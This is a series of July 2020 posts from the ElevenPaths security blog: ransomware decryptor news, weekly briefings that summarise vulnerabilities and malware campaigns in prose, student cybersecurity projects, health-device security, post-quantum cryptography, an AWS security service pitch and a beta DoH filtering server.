4th Anniversary of No More Ransom: ElevenPaths, Partner Entity with Two Tools

Innovation and Laboratory Area in ElevenPaths    27 July, 2020

The No More Ransom Project celebrates its fourth anniversary today after helping over 4.2 million visitors recover from a ransomware infection and saving an estimated $632 million in ransom payments. ElevenPaths is part of this project with two tools.

No More Ransom was created on 25 July 2016 through an alliance between Netherlands’ Police, Europol and McAfee. Today, The No More Ransom Project includes more than 150 partners worldwide in the spirit of preventing and mitigating major ransomware attacks which continue to make the headlines and hit businesses, governments, and individuals around the world.

The platform www.nomoreransom.org has two clear objectives: On the one hand, supporting and enabling ransomware victims to recover their encrypted information without having to pay the criminals; on the other hand, to pursue from a legal point of view those responsible for these scams by sharing information with security forces. ElevenPaths contributes with its experience developing and offering two free tools to this initiative. Thanks to the efforts of the Innovation & Labs area we are part of the project as one of the 16 partner entities together with Avast, Bitdefender, CERT from Poland, Check Point and Emsisoft, among others.

Popcorn Decryptor and VCryptor Decryptor: Our Tools

RecoverPopCorn is a utility developed by ElevenPaths Innovation Area to fix infection caused by PopCorn ransomware. Thanks to this contribution we became one of the partners of the project.

In June 2020, we created another tool against VCryptor ransomware. Discovered by several antivirus companies, this malware encrypts user files (desktop, documents, images, etc.) in a password-protected zip file and creates .vcrypt files that are used to request a ransom.

Cybersecurity Weekly Briefing July 18-24

ElevenPaths    24 July, 2020

New Emotet Campaign after 5 Months of Inactivity

After several months of inactivity, Emotet is back with a massive sending of reply-chain and payment emails, among others, that include malicious Word documents attachments aimed at users all over the world. Researcher Joseph Roosen stated that the Emotet botnet would be spewing forth massive amounts of spam, including malicious documents with updated URLs, commonly of compromised WordPress sites. Once the victim is infected, the malware would deploy further modules that steal the victim’s mail, spread to other computers, or use the infected computer to send spam.

More: https://blog.malwarebytes.com/trojans/2020/07/long-dreaded-emotet-has-returned/

Ransomware Incident against Blackbaud

Blackbaud, a software and cloud storage provider, has reported having suffered an unidentified ransomware incident. According to the company, last May actors performed an attack on its internal network with the aim of deploying ransomware. As a result, the security team managed to prevent the encryption of files belonging to Blackbaud by expelling the malicious actors from the network. However, prior to their locking cybercriminals out, these managed to steal the information of a small subset of customers, which have already been notified. Consequently, the attackers have already threatened to make the stolen information public unless a ransom is paid. The company has guaranteed that it will meet these demands and will pay for the deletion of the data. This incident adds to the current trend of double extortion that characterizes this type of attack, where not only is the information encrypted, but it is also stolen and a ransom is demanded, both to decrypt it and not to make the files public.

More: https://www.blackbaud.com/securityincident

Exploit for RCE Vulnerability in SharePoint

Security researcher Steven Seeley has published details of how the critical vulnerability CVE-2020-1147 can be exploited in SharePoint to achieve remote code execution as a low-privileged user. In this case, Seeley has demonstrated how, by making use of DataSet objects, code execution can be achieved by using the “LosFormatter.Deserialize” method. To do so, a base64 payload must be generated. Once this has been done, this payload could be plugged into a specific DataSet and thus achieve remote code execution against the target SharePoint server. This method could be used against several applications built with .NET, so even if the user does not have a SharePoint Server installed, it could still be impacted by this bug.

More: https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html

Phishing Campaigns on Cloud Services

Check Point’s research team has published their research warning about the use of cloud services such as Google Cloud or Microsoft Azure for phishing campaigns. In January 2020, researchers detected a PDF document on Google Drive that included a link to a phishing page hosted on Google’s servers. In this incident, the threat actors spoofed a SharePoint login page requesting user or corporate credentials in order to exfiltrate the information. During all these stages, users do not suspect any malicious activity since the phishing page is hosted on Google Cloud Storage and the HTTPS encryption protocol is displayed. One way to identify these scams was to view the source code of the phishing page, because it could be identified that most of the resources were loaded from a website belonging to the malicious actors. However, more recent attacks reveal that threat actors have started using Google Cloud Functions, a service that allows the running of code in the cloud, thus obfuscating attackers’ malicious domains.

More: https://blog.checkpoint.com/2020/07/21/how-scammers-are-hiding-their-phishing-trips-in-public-clouds/

Emotet Botnet Is Spreading QakBot Malware

Cryptolaemus has reported that recently Emotet has started spreading QakBot malware. This campaign would use e-mails as attack vector for the spread of this malware obfuscated in malicious documents. It should be noted that in recent days the MalwareBytes team has warned of a new Emotet campaign after five months of inactivity, which has traditionally been linked to the distribution of another malicious tool named Trickbot. However, this new finding could show that there is a new trend regarding the distribution of Qakbot, as Cryptolaemus claims to have observed the absence of TrickBot in the most recent Emotet attacks. The researcher also indicated that there is a history of change in the distribution of malware, although this does not occur frequently. One such change was already observed last year, so it is considered likely that TrickBot will be used again in the future and resume its traditional attack methodology.

More: https://twitter.com/Cryptolaemus1/status/1285579090234400769

University and Industry: Talent Is Out There (III)

Innovation and Laboratory Area in ElevenPaths    23 July, 2020

Our supervision of students in different areas of cybersecurity continues to bear fruit. Research, development, and innovation efforts made jointly with students always produce better results than expected, as mutual benefits arise from each collaboration.

On the one hand, the student learns from the tutor’s expertise, guiding their work towards a market reality that would otherwise be impossible. On the other hand, the tutor who is involved in the progress of the project takes advantage of the student’s support to improve their skills, motivating the reskilling and upskilling that an academic project such as a Bachelor’s Degree or Master’s Degree project implies.

Selected Projects

This time we bring two projects corresponding to the 3rd edition of the Master in Cybersecurity of UCAM in collaboration with Telefónica. These are two very different projects that show the wide variety of disciplines coexisting in cybersecurity.

The first is a proposal for an educational space called Ciberaprende, which emerged as a Master’s Degree project and has become a fully operational educational platform for free training in digital skills, carried out by Javier García Cambronel. The second one is a Software of Detection and Classification of Private Content developed by Santiago Vallés. They describe their own projects.

Ciberaprende

Ciberaprende was born as a project designed to last over time. It is a virtual space whose content can be accessed for free. Ciberaprende was born on the idea of creating opportunities for a better life through training in digital skills. This space is composed of two well-differentiated parts.

Ciberaprende

The first one consists of the creation of a free learning platform based on Moodle, with a website developed in WordPress as its cover. In this part, it has been carried out the installation, configuration and securization of the server where both the platform and the website are hosted. On the other hand, the same has been done for the web and the platform itself, focusing largely on securization and adding other topics such as design, positioning, performance, accessibility, etc.

The second part of this project deals with content. The course carried out is “Computer Security: Malware” (in Spanish, Seguridad Informática: Malware), with a duration of 50 hours and a low difficulty. The objectives of the course are:

  • Identify and analyse the existing risks in the field of information security.
  • Learn the main types of malware.
  • Learn the threat posed by malware in all its variants.
  • Discover the consequences of an infection.
  • Learn how to use the protection methods available to protect ourselves.

Within the course, you will find a great deal of content, structured in 5 modules:

  • Module 1: Introduction to security in information systems.
  • Module 2: Introduction to malware.
  • Module 3: Malware, a real and current threat.
  • Module 4: Security strategies against threats.
  • Module 5: Security tools.

And within the contents we find:

  • Over 80 pages of theory.
  • More than 25 learning pills.
  • Over 100 questions.
  • More than 10 interactive activities.
  • More than 5 case studies.
  • 1 satisfaction survey.
  • 1 certificate issued at the end of the course.
This image has an empty alt attribute; its file name is image-17.png

Ciberaprende is a project in which a lot of effort and commitment has been invested. During its development, many skills have been acquired and lessons learned that have not only allowed the assimilation of additional cybersecurity knowledge, but also a better way of disseminating such knowledge.

For example, the securization of a Linux server with different types of tools, a WordPress website and a Moodle-based platform, among the most technical ones. All this in addition to the challenge of developing an interactive course including an interesting theoretical load, with different types of activities and videos to motivate the student.

Ciberaprende has become a functional platform whose future is to improve at every step, evolving as a platform. By adding new contents and tackling other digital skills, new types of activities and games of different nature will be introduced to allow the acquisition of new skills through gamification. In addition, it will be possible to introduce multimedia content generated specifically for the courses and the subject matter of each one.

Software of Detection and Classification of Private Content

Companies own, manage, and offer numerous services that process their own information, in many cases in an automated manner. On other occasions, this transfer of documentation is carried out manually sending, receiving, and checking various contents.

Frequently, the information ends up in a web portal, a public repository or any other place used to publish content. Therefore, it is possible to crawl over these public sites, by using for example Scrapy, to download all public documents.

However, how do we know if sensitive or confidential company’s or employee’s information is being leaked? Is there a unique tool to address this problem? We can use free software to try to solve this issue. We will do this by using two technologies:

  • Regular Expressions
  • Machine Learning
Diagram – System internal process

The idea behind this project focuses on the generation of an indicator that we will call “File Risk”, a score that represents the amount of private information that is being filtered in the document. Let’s give some examples:

  • Downloading a file containing a single email address is not the same as finding a list of 200 company email addresses. Therefore, we see that we have a factor that impacts on risk and it is the number of occurrences of a type of personal data.
  • Let’s suppose now that we are looking for a number that could match a credit card as a type of data. With only one finding we can consider that this risk is high. Therefore, we propose that the user can give a numerical value to each type of data. We will call this factor “Impact” and it is configurable by the user.

We take as an example a PDF medical report and upload it to the system. After the analysis, we obtain the following table of results:

TYPEIMPACTOCURRENCESRISK
PERSON32060
URL122
EMAIL200
IP500
DNI5000
SHAREFOLDER1000
PHONE1000
CUIL900
CREDITCARD5000
MONEY300
Risk table showing the calculation of each type of data

You can see that the system found several occurrences of the data type PERSON, which refers to the name of persons. In addition, we will have a bar chart to check more quickly each of the risks by type of data:

Findings by type

Then, our system will generate a simple count where the file risk is the calculation of the sum of all the occurrences found multiplied by the individual impact of each one.

File risk = ∑ 𝐼𝑚𝑝𝑎𝑐𝑡 𝑛 no. of findings 𝑛

The system will show the result as “Total File Risk” with a numerical value that corresponds to the previous sum. This value can be used to filter and order hundreds or thousands of files from a website in order to focus on those that have a greater chance of containing private data.

Therefore, this system allows to combine the use of regular expressions as a static approach, covering the most common data types (ID, credit card number, etc.), together with natural language processing to detect all those kinds of words when comparing them with a trained machine learning model (using Spacy and Scikit-Learn).

Besides this, it gives the possibility to determine if that set of words composes a document that can be categorized within a certain classification. After analysing the document, the system will generate an output type:

This image has an empty alt attribute; its file name is image-23.png

In this example, if to the category that the model predicted (medicine) we add the names that our system found in the word analysis, we have no doubt that it would be a candidate for review. We are aware that machine learning models can be improved, but in this case we can verify that if we take the prediction with a higher percentage, the system hits the model, indicating that it is a file with medical content.

Thanks to this work we could verify the benefits of text classification methods using natural language processing and trained machine learning models. However, for a type of numerical scoring system such as the one implemented here, false positives that can increase the risk value of the file must be considered.

Security and Privacy on the “Internet of Health”

Carlos Ávila    21 July, 2020

At the time of writing this article, there are many companies around the world that are innovating, creating and improving various applications, robots and gadgets to monitor our health. In fact, many of these are already a reality and are being sold in the application market and implemented in hospitals around the world.

All these watches with sensors, chips inserted in our bodies, smart phones and other devices are fantastic and store a lot of user data but, is this data being protected? Will it be used to issue diagnoses? What about the security of the software of these devices? What do we get, for example, from surgeries performed by robots by remote control?

The Digitization of the Healthcare Industry

We talk about innovation, digitalisation and robotisation in the health industry and this has led mankind to carry out interesting projects such as the well-known DaVinci (the robot with the most advanced surgical system in the world) or perhaps lesser-known projects such as the microrobot called ViRob, designed to clean and drain “pipes” from the body as a necessity in operations.

But if we talk about common devices and accessibility for users, we find hearing aids to monitor your overall health in real time. In terms of mobile applications, we see how a photograph taken with a mobile device and advanced image processing could detect certain types of skin cancer. So much so that GoogleLeNet project, originally designed to interpret images for smart cars, has been working on this for a long time.

At present it is impossible to keep up with such a large number of devices that generate information and this is no exception for doctors. A doctor can make diagnoses from his experience with several patients, but a computer is currently doing so based on data and comparisons of results that were obtained from hundreds or millions of similar cases.

Health Comes First, As Long As It’s Secure

The data that is processed today by all these gadgets in the health industry needs to be reliable and secure in order to make a reliable diagnosis through analysis. Therefore, the software developments that make these technological devices work must be protected and tested.

The cybersecurity community, as well as security companies in general, have been conducting research on this topic, where they have exposed attack vectors and vulnerabilities on this type of environment. Similarly, the FDA (US Food and Drug Administration) has created guidelines and makes frequent calls to the creators of medical technologies to ensure the security of their products.

The health industry, like many others, depends largely on technology to understand our health status. Each new device we use is likely to share data in some way with other platforms for physician decision-making.

The “Internet of Health”

Just as the “Internet of Things” refers to interconnecting various devices so that in many cases they interact automatically, the “Internet of Health” will perhaps allow all our medical data to be connected together, so that through various systems they can be condensed into a comprehensive report.

We are now at the point where all this data is being stored in environments that should have a level of security that is managed, evaluated and monitored frequently, because decision making will depend on it.

It is really important that we get involved in this problem as a community and as users. Furthermoe, it is necessary that both governments and legal entities ensure full commitment of all actors in this industry on a permanent basis through laws and regulations. In this way, we will be able to maintain an adequate level of security that will allow us to feel a little calmer in the face of cyber threats.

Challenges and Business Opportunities of Post Quantum Cryptography

Gonzalo Álvarez Marañón    20 July, 2020

If you’re reading this article from an internet browser, take a close look at the little lock at the top of the address bar. Click on it. Now click on “Certificates”. Finally, select the ‘Certificate details’ tab. Notice the value “Public Key”, what do you see? RSA, maybe DSA or even ECDSA. Well, in a few years, you’ll stop seeing those algorithms. Why? Because the quantum computers will have wiped them off the map.

Look now at other secure communication protocols: TLS, responsible for the little lock that protects web pages and practically protects everything; the end-to-end encryption of WhatsApp or Zoom, etc. Think about digital signatures: contract validation, identification of software authorship, identity verification, guarantee of ownership in blockchain, etc. Those same algorithms (RSA, DSA, ECDSA) are everywhere, but their days are numbered: 10 or 15 years, at most. Will it be the end of privacy? No more secrets? Luckily, no. There is cryptographic life beyond RSA and DSA and ECDSA.

Welcome to the post-quantum future!

Hello, Quantum Computers. Goodbye, Classic Cryptography

Quantum computing is more efficient than classical computing in some tasks, such as solving the mathematical problems on which rest the security of the public key algorithms that we use today for encryption and digital signature: RSA, DSA, ECDSA, ECC, DH, etc.

In a world of quantum computers, cryptography requires algorithms based on mathematical problems that are impervious to advances in quantum computing. Fortunately, such cryptographic algorithms have existed for decades. They are collectively known as post-quantum cryptography (PQC). The three best studied alternatives to date are:

  • Hash-based cryptography: as the name suggests, they use secure hash functions, which resist quantum algorithms. Their disadvantage is that they generate relatively long signatures, which limits their use scenarios. Leighton-Micali Signature Scheme (LMSS) or Merkle signature schemes are among the strongest candidates to replace RSA and ECDSA.
  • Code-based cryptography: Code theory is a mathematical specialty that deals with the laws of information coding. Some coding systems are very difficult to decode, even requiring exponential time for a quantum computer. The best studied cryptosystem to date is that of McEliece, another promising candidate for key exchange. Its drawback: keys millions of bits long.
  • Lattice-based cryptography: possibly the most active field of research in post-quantum cryptography. A lattice is a discrete set of points in space with the property that the sum of two points of the lattice is also in the lattice. A difficult problem is to find the shortest vector in a given lattice.

    For their resolution, all classical algorithms require time that grows exponentially with the size of the lattice and it is believed that the same will happen with quantum algorithms. Currently there are numerous cryptosystems based on the Shortest Vector Problem. The example that has perhaps attracted the most interest is the NTRU public key encryption system.

So, if we already have substitutes for RSA, DSA, ECDSA, why not continue with the old algorithms until the first quantum computers capable of breaking them appear, and then switch with a click to the post-quantum ones?

In Cryptography, Births Are Long and Painful

There are four powerful reasons to start working now on the transition to post-quantum cryptography:

  • We need time to improve the efficiency of post-quantum cryptography: to give you an idea, to achieve the security provided by b-bit keys in ECC, post-quantum algorithms may require keys between b2 and b3 bits, so do the math. Efficiency improvement is especially critical when thinking about constrained devices, widely used in IoT applications, and main targets of the PQC.
  • We need time to build confidence in post-quantum cryptography: NIST has initiated a process to request, evaluate, and standardize one or more PQC algorithms for digital signature, public key encryption, and session keying. The IRTF Crypto Forum Research Group has completed standardisation of two hash-based signature algorithms, XMSS and LMS, which are also expected to be standardised by NIST.
  • We need time to improve the usability of post-quantum cryptography: these standards should be incorporated into the cryptographic libraries used by the most popular programming languages and by the cryptographic chips and hardware modules.

    The Open Quantum Safe (OQS) project is working on liboqs, an open source C library for PQC algorithms. These will then have to be integrated into cryptographic standards and protocols, such as TLS, X.509, IKEv2, JOSE, etc. OQS is also working on liboqs integrations into OpenSSL and OpenSSH. Then, these standards and protocols should be included by all vendors in their products: from hardware manufacturers, to software manufacturers.
  • We need to protect some secrets for a long time: there is very valuable data that has a long life span: employee records, health records, financial records, etc. In the military and industrial field the need to secure secrets for a long time is even greater. For example, design plans for new military weapons or commercial aircraft could be stolen today, encrypted with classic algorithms, waiting for quantum computers to decipher them even decades after the theft.

In short, we are not yet ready for the world to switch to post-quantum cryptography at the touch of a button.

Will Quantum Cryptography Be The Best Weapon Against Quantum Computers?

Quantum cryptography today boils down to quantum key distribution (QKD): exchanging a random key between two unauthenticated ends with the certainty that any interception attempt will be detected. This key can then be used to encrypt confidential information using Vernam’s algorithm to ensure perfect secrecy, even in the face of an attack from a quantum computer.

Not so fast! Unfortunately, QKD has many practical drawbacks that make its adoption inadvisable, at least in the near future:

  • Since QKD protocols do not provide authentication, they are vulnerable to man-in-the-middle attacks in which an adversary can agree to individual secret keys shared with two parties who believe they are communicating with each other.
  • QKD requires specialised and extremely expensive hardware.
  • The distances at which QKD can transmit keys are currently modest, in the range of a few thousand kilometres with very delicate experimental prototypes, far from commercially viable.
  • QKD is used to agree on keys, but not to digitally sign information. Cryptography goes far beyond symmetrical encryption.

In short, for most real-world communications systems out there, PQC will provide an antidote to quantum computing that is more effective and efficient than QKD.

Where Will We See Applications of PQC In The Near Future?

According to the report Post-Quantum Cryptography (PQC): A Revenue Assessment released on the 25th June by the quantum technology analyst firm Inside Quantum Technology, the market for post-quantum cryptography software and chips will soar to $9.5 billion by 2029. While PQC’s capabilities will be incorporated into numerous devices and environments, according to the report, PQC’s revenues will be concentrated in web browsers, IoT, 5G, law enforcement (police, military, intelligence), financial services, health services and the cybersecurity industry itself.

If everyone is aware of the shadow of quantum computing over classical cryptography, why aren’t they investing more resources in PQC right now? Because all the players are waiting for the NIST (National Institute of Standards and Technology) to complete Round 3 of its PQC standards, which will happen in 2023.

From that date, services offered by the cybersecurity industry will include NIST-standardised PQC algorithms. For example, Inside Quantum Technology believes that manufacturers will provide PQC offerings as a service for email and VPN. In addition, the cybersecurity industry will recommend, develop, and implement PQC software for their customers. They predict that by 2029 the revenue from PQC-related cybersecurity offerings will likely reach $1.6 billion.

Make The Leap to PQC Before It’s Too Late

If your organization is currently handling encrypted information whose confidentiality needs to be guaranteed for more than 10 years, you’d better take a look at the PQC product offering.

In the meantime, you may want to take a look at the commercial solutions available to your organization to see if they can be put into production. Since you will have to make the leap to PQC sooner or later, it’s best to calmly examine strategies for reducing the costs of technology changeover and preparing for the transition.

Because you can be sure of one thing: the day of the PQC will come.

Cybersecurity Weekly Briefing July 11-17

ElevenPaths    17 July, 2020

Combining Citrix vulnerabilities to steal user sessions

On July 7th, Citrix published a security bulletin to correct up to 11 vulnerabilities. A few days later, a report was released with detailed information on these flaws and was accompanied by a proof of concept. Last weekend, a new investigation has been published showing how, by combining three of those 11 vulnerabilities – CVE-2020-8193, CVE-2020-8195 y CVE-2020-8196, a threat agent could obtain currently authenticated users’ session data. According to researchers from the NCC Group, these flaws are actively exploited by cybercriminals, who use CVE-2020-8193 to evade authentication and CVE-2020-8195 or CVE-2020-8196 to steal VPN sessions data from the user’s device. Moreover, other attempts to extract other pieces of information from the user’s device have also been spotted. In order for a system to be vulnerable, the attacker must have access to the device’s NSIP interface. If said interface is not exposed on the internet, the risk of exploitation decreases.

More: https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/

SAP patches critical vulnerability

SAP has issued a patch to correct a critical vulnerability affecting over 40,000 clients using SAP NetWeaver AS JAVA versions from 7.30 to 7.50. The bug in this configuration assistant has been tagged with the identifier CVE-2020-6287 with a CVSS of 10. An unauthenticated threat agent could exploit this flaw through the HTTP protocol to take over control from SAP applications due to a lack of authentication requests in a web component of the affected software. This vulnerability is considered critical given that the affected applications are usually exposed on the Internet. It is recommended for SAP users to patch this flaw as soon as possible.

Link: https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675

Anchor_DNS: New Linux Backdoor

A new report has been published indicating that developers of the popular malware TrickBot are also responsible for the recent development of a new version of the Anchor_DNS backdoor for Linux systems. This backdoor, which is mainly used for DNS communication with the Command & Control server, is that it is installed as a Cron Job and goes on to check the infected device’s public IP through requests to external URLs. Once this is done, the backdoor starts transmitting information through DNS queries to the C2 server under control of the attackers. This Linux version also supports Windows systems running through SMB or IPC.

Link: https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30

Critical Vulnerability in Windows DNS Server

Microsoft has published their monthly patch including a fix for a vulnerability classified as CVE-2020-1350 with a CVSS v3 of 10. This is a critical flaw in Windows DNS Server whose exploitation could allow an attacker to remotely execute code in those Windows domain environments, especially in domain controllers without applied patches. Due to an improper handling of requests, it leads to the potential execution of arbitrary code in the context of the Local System account. It is strongly recommended to update urgently according to the manufacturer’s instructions.

Link: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350

Adobe fixes 13 vulnerabilities

Adobe has released software updates to patch a total of 13 new security vulnerabilities affecting 5 of its widely used applications: Adobe Creative Cloud Desktop Application, Adobe Media Encoder, Adobe Genuine Service, Adobe ColdFusion, Adobe Download Manager. Out of these 13 vulnerabilities, 4have been rated critical, and 9are important in severity. None of the security vulnerabilities fixed in this batch of Adobe updates were publicly disclosed or being exploited in the wild.

  • Adobe Creative Cloud Desktop Application versions 5.1 and earlier for Windows operating systems contain four vulnerabilities, one of which is a critical symlink issue (CVE-2020-9682) leading to arbitrary file system write attacks.
  • Adobe Media Encoder contains two critical arbitrary code execution (CVE-2020-9650 and CVE-2020-9646) and one important information disclosure issues, affecting both Windows and macOS users running Media Encoder version 14.2 or earlier. 
  • Adobe Download Manager has been found vulnerable to only one flaw (CVE-2020-9688) that’s critical in severity and could lead to arbitrary code execution in the current user context through command injection attack.
  • Finally, Adobe Genunine Service and Adobe ColdFusion suffered important severity privilege escalation issues.

Link: https://helpx.adobe.com/security.html

Cisco security updates

Cisco has published patches for up to 31 vulnerabilities in its products, 5 of them considered critical, 11 high and 15 medium:

  • CVE-2020-3330 CVSS 9.8: Default static passwords in Cisco Small Business RV110W Wireless-N Firewall VPN could allow an unauthenticated, remote attacker to take full control of the device with a high-privileged account.
  • CVE-2020-3323 CVSS 9.8: Vulnerability in Cisco Small Business RV110W, RV130, RV130W and RV215W that could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device due to improper validation of user-supplied input in the web-based management interface.
  • CVE-2020-3144 CVSS 9.8: vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, RV130 VPN Router, RV130W Wireless-N Multifunction VPN Router, and RV215W Wireless-N VPN Router that could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary commands with administrative commands on an affected device.
  • CVE-2020-3331 CVSS 9.8: Flaw in routers RV110W and RV215W series that could allow the execution of arbitrary code due to an improper validation of user-supplied input data by the web-based management interface
  • CVE-2020-3140 CVSS 9.8: Vulnerability in the Cisco Prime License Manager (PLM) product that could allow an unauthenticated, remote attacker to gain administrative-level privileges on the system of the affected device

According to the Cisco Product Security Incident Response Team (PSIRT), they are not aware of any public announcements or malicious use of these vulnerabilities.

Securing your Cloud Native Applications in AWS in the New Normal

Pablo Alarcón Padellano    Katterine Nodarse Morales    Emilio Sánchez de Rojas Rodríguez de Zuloaga    16 July, 2020

The New Cloud Adoption Reality

Yes, we are facing a New Normal, and we are living a new cloud adoption reality as well. Enterprise cloud adoption accelerates in face of Covid-19, which has radically transformed how businesses view cloud opportunity, as the pandemic may have caused some enterprises to re-evaluate their public cloud strategies as remote ways of working become embedded in accepted operational procedures. Attitudes toward the cloud today are driven by innovation and risk reduction, both of which have come into focus during the current crisis.

Yet while cloud adoption offers a powerful opportunity to unlock business value, there remains notable hesitation around the challenges of this transition. Cybersecurity concerns remain a significant barrier, although Cloud Service Providers (CSPs) play an important role in improving and making sure users understand and have what they need to run cloud native applications, but they don’t take responsibility for security beyond what they promise in their agreements. There are important end-users’ security responsibilities that need to be taken to ensure cloud native security and protect their cloud environments and workloads — especially those that CSPs cannot effectively secure for being out of their scope.

Security Challenges in the New Paradigm

Under the AWS shared responsibility model, AWS provides a global secure infrastructure and foundation compute, storage, networking and database services, as well as higher level services. AWS provides a range of security services and features that you can use to secure your assets. As an AWS customer you are responsible for protecting the confidentiality, integrity, and availability of your data in the cloud, and for meeting specific business requirements for information protection, bringing a new governance model. Enterprises are migrating their legacy applications and developing new cloud native applications to generate value for the business, and to achieve that it is imperative to secure them according to this shared responsibility model.

One of the fundamental paradigm shifts is that proper configuration is key to ensuring the basic AWS capabilities and services that support these native applications. Furthermore, it is fundamental to ensure an adequate security posture and to ensure compliance with corporate security policies. Cloud misconfiguration remains one of the main causes of data breaches in the Cloud.

The flexibility and scalability of the cloud services and workloads have fostered the adoption of DevOps methodologies for cloud native applications, which make cloud environments more dynamic and forces companies to include security in these processes to protect applications throughout their complete lifecycle without affecting the release speed and time to market goals.

Security teams are responsible for addressing these challenges to have a secure cloud infrastructure, and that requires having continuous visibility of the configuration of assets and services, data, and activity of user, services and workloads running on top, to apply the required security measures.

Trusted Partner

The challenges of cloud security are complex, so it is essential to work with expert and trusted partners who have the knowledge and skills to guide and supervise the security of your cloud processes. CSPs can’t predict how every individual customer will use their environment, only customers know the intricacies of what they put in the cloud. With the current shortage of cybersecurity skills, it is difficult for security teams to find the right talent to keep their organization safe.

Most cloud customers aren’t fulfilling their shared responsibility for security, and  if you do not have unfortunately sufficient means, due to lack of skilled personnel and / or budget, to exercise that protection responsibility, and to minimize the risks derived from the continuous development and launch of applications that support your business, what can you do?

At ElevenPaths we can help you raise your security posture of your AWS infrastructure and services, allowing you to gain the control and confidence you need to securely run your business. We promote three fundamental areas to position ourselves as your expert partner in cloud security:

  1. Knowledge: through specialized training of our professionals, test laboratories, etc. We have accredited professionals in the design, implementation, operation and management of native cloud security, aligned with your business;
  2. Tools: We have a wide portfolio of tools (services and capabilities) supported by the best technologies from our security partners to guarantee the best possible protection; and
  3. Proven experience: with CSPs, our security partners and our customers, thanks to our proven experience in deployed security projects and services.

Two months ago we excitedly announced that we had achieved AWS Security Competency status, as APN Consulting Partner providing expert guidance to AWS customers on how to leverage security tools and embed best practices into every layer of their environment. Achieving the AWS Security Competency differentiates ElevenPaths as an AWS APN member that provides specialized security engineering and consulting services designed to help enterprises adopt, develop and deploy complex security projects on AWS.

Two months ago we excitedly announced that we had achieved AWS Security Competency status, as APN Consulting Partner providing expert guidance to AWS customers on how to leverage security tools and embed best practices into every layer of their environment. Achieving the AWS Security Competency differentiates ElevenPaths as an AWS APN member that provides specialized security engineering and consulting services designed to help enterprises adopt, develop and deploy complex security projects on AWS.

How Can We Help You Secure Your AWS Deployments?

ElevenPaths’ Cloud Security best in class integrated and end-to-end cloud security value proposition covers security topics such as identifying, categorizing and protecting your assets on AWS, managing access to AWS resources using accounts, users and groups and suggesting ways you can secure your data, applications and overall infrastructure in the cloud.

Our AWS Certified Security Specialty experts are fully skilled to design, deploy and manage AWS innovative cloud-native security features, including the controls in the AWS environment and some of the products and features that AWS makes available to customers, alongside best in breed ISV security solutions, helping you to move securely critical workloads to the public cloud, while keeping compliance and governance.

We help you define and implement a strategy that will enable you to achieve your cloud security goals. To carry out this strategy, based on three axes – implementation of control frameworks for cloud governance, monitoring and tracking and establishment of the security operating model – we have the following capabilities:

  • ElevenPaths provides specialized security engineering and consulting services to help you design, develop and deploy complex security projects on AWS. Our certified AWS Security specialists help you define a holistic AWS security model and implement controls for visibility and compliance monitoring:
    • Definition and implantation of Control Frameworks aimed at AWS environments, aligned with your organization’s governance model and which can be continuously monitored.
    • Assessment of your security posture in AWS (ElevenPaths CSAx: Cloud Security Assessment Express), enabling you to understand your current security posture, analysing its context and proposing actions for improvement.
    • Design and build of the cloud security platform that best meets your needs to monitor the security controls, enable threat detection, protect against data leakage and take advantage of related security information, building in the foundations of AWS cloud-native controls like CloudTrail, Security Groups, GuardDuty and many more, to secure your cloud architecture combined with advanced ISV security solutions.
  • ElevenPaths provides Managed Cloud Security Services on AWS to monitor your security posture and protect your critical workloads deployed on AWS:
    • Cloud Managed Security Services for AWS (Cloud MSS) that provides comprehensive visibility into your cloud assets, network security and native services configuration in order to identify inherent risks, enforce compliance requirements and governance standards and identify security incidents close to real time providing automated alerting and automated response for specific use cases.  
    • Secure DevOps will allow the inclusion of security into the DevOps process in your native Cloud application pipeline and toolchain in order to automate Guardrails for secure infrastructure (IaC), workloads and application deployment in a continuous improvement process.

    ElevenPaths Is Well-Positioned to Secure Your AWS Applications

    ElevenPaths Cloud Security offering and value proposition, based in the deep expertise of our professionals and proven success securing every stage of cloud adoption, from initial migration through ongoing day to day management. With ElevenPaths’ Cloud Security for AWS, your organization is not only getting the most advanced cloud managed security service, but also getting a trusted security advisor and AWS Consulting Partner to help you as an extension of your own team. Together we are stronger.

New ElevenPaths DoH Server (Beta) That Filters Out Malicious Domains

Innovation and Laboratory Area in ElevenPaths    15 July, 2020

From the ElevenPaths Innovation and Laboratory Area we have created our own DoH server (beta) that filters out malicious domains thanks to our intelligence system. As well as improving the user’s security, it also safeguards their privacy.

It is very easy to use thanks to our Firefox extension. As it is a beta version, we cannot guarantee SLAs, but our tests have been satisfactory enough to be able to release it publicly.

For more information, and to download the DoH server, visit https://doh-beta.e-paths.com.

How Do You Use It?

Like for any other DoH, it is necessary to modify your Chrome or Firefox settings. If you use Firefox, it is as simple as installing our extension from https://easydoh.e-paths.com, which already has our server built in.

Soon, it will also be possible to use it from https://thethe.e-paths.com as a plugin to check for malicious domains.

What Are The Advantages?

This server filters out malicious domains that come from our intelligence systems. There is still a lot to improve, but we will do it in a transparent way and we hope that it will be increasingly more effective.

What Is DoH?

Some time ago, the IETF (Internet Engineering Task Force) raised the RFC proposal for DNS over HTTPS, which is about resolving domains through the well-known HTTPS.

This technology goes beyond what it may seem for two reasons: firstly because it is a new resolution paradigm that removes the foundations of the network, and secondly because the backing of having RFC together with the interest shown by browsers (eager for the power this grants them) has made them launch their implementation in record time.

You can find more information about DoH here.

Cybersecurity Weekly Briefing July 4-10

ElevenPaths    10 July, 2020

RCE Vulnerability in F5’s BIG-IP (CVE-2020-5902)

